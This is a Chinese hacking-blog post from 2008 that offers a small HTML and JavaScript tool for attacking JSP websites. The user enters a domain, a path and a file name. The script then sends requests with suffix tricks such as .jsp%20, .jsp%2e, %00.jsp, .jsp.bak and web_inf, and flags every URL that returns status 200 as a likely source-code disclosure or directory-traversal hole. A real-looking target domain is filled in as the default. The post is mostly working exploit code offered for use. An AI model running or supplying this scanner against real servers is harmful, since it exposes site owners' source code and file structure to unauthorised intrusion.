影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2009 - 7 48
   1234
567891011
12131415161718
19202122232425
262728293031


站点统计
日志:1107 篇
评论:3702 篇
引用:303812 个
会员:1169 人
留言:163 个
访问:17123097 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容
判断cookies注入的js语句 phpcms injection 0day
晴天 一个暴jsp源码的网页   [ 日期:2008-03-08 ]   [ 来自:影子鹰 ]

<head>
<base target="_blank">
</head>
<style>
BODY {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
BR {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
TD {FONT-FAMILY: "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
a {COLOR: #llccxx; text-decoration: none}
a:hover {color:#llccxx;text-decoration:none}
</style>
<center>
<pre>
海阳顶端网jsp暴源码及目录网页使用帮助:
第一个写域名;第二个写路径;第三个写文件名,注意不要加扩展名:
</pre>
<input type=text id=http size=28 style="border:1px solid #99CCdd; " value="http://www.ctm.net">
<input type=text id=path size=36 style="border:1px solid #99CCdd; " value="/cgi-bin/ctm/jsp/cn/NHS/demo/">
<input type=text id=cindex size=6 style="border:1px solid #99CCdd; " value="main">
<input type=button onclick=isExist(http.value) value="检测JSP源码及目录遍历" style="border:1px solid #99CCdd; ">
<div id="t"></div>
<script>
function isExist(url)
{
var myObject = new Object();
myObject.lcx1 = ".jsp.";
myObject.lcx2 = ".jsp+";
myObject.lcx3 = ".jsp%20";
myObject.lcx4 = ".jsp%2e";
myObject.lcx5 = ".jsp%70";
myObject.lcx6 = ".jsp%81";
myObject.lcx7 = ".jsp%2581";
myObject.lcx8 = ".JSP";
myObject.lcx9 = ".Jsp";
myObject.lcx10 = ".jsp.bak";
t.innerHTML+= "<br>目录遍历的方法,暂且收了这么多:<br><br>"
t.innerHTML+= "<a href=" +http.value+path.value+">"+http.value+path.value+"<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"%00.jsp>"+http.value+path.value+"%00.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"%3f.jsp>"+http.value+path.value+"%3f.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"?.jsp>"+http.value+path.value+"?.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+"web_inf>"+http.value+path.value+"web_inf/<br><br>";
t.innerHTML+= "估计以下有个链接肯定存在暴源码或出错漏洞,俺可不是瞎说,没有漏洞俺不列,下雨阴天闲着也是闲着,挨个点一下看看吧:<br><br>";
for (lcx in myObject)
{
xmlhttp = new ActiveXObject(" Microsoft.XMLHTTP")
xmlhttp.open("GET",http.value+path.value+cindex.value+myObject[lcx],false)
xmlhttp.send()
if(xmlhttp.status==200)
t.innerHTML += "<font color=red><a href="+http.value+path.value+cindex.value+myObject[lcx]+">"+http.value+path.value+cindex.value+myObject[lcx]+"<br></font></a>";
else
t.innerHTML+= http.value+path.value+cindex.value+myObject[lcx]+"你白费心了,俺不存在漏洞,不用点<br>";
}
}
</script>
</center>


[ 字体大小: ]
引用通告地址 (0):
复制引用地址http://www.cnyzy.cn/trackback.asp?tbID=718
复制引用地址http://www.cnyzy.cn/trackback.asp?tbID=718&CP=GBK
请不要吝惜您的评论,每一条评论,都是我在漫漫长夜前行的力量...
暂时没有评论
发表评论 -不要忘了输入验证码哦![本站已启用NoFollow标签,广告者请止步!]
作者: 用户:  密码:   注册? 验证: 
评论:

禁止表情
禁止UBB
禁止图片
识别链接
识别关键字
表  情
   
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.046875 second(s) , 8 queries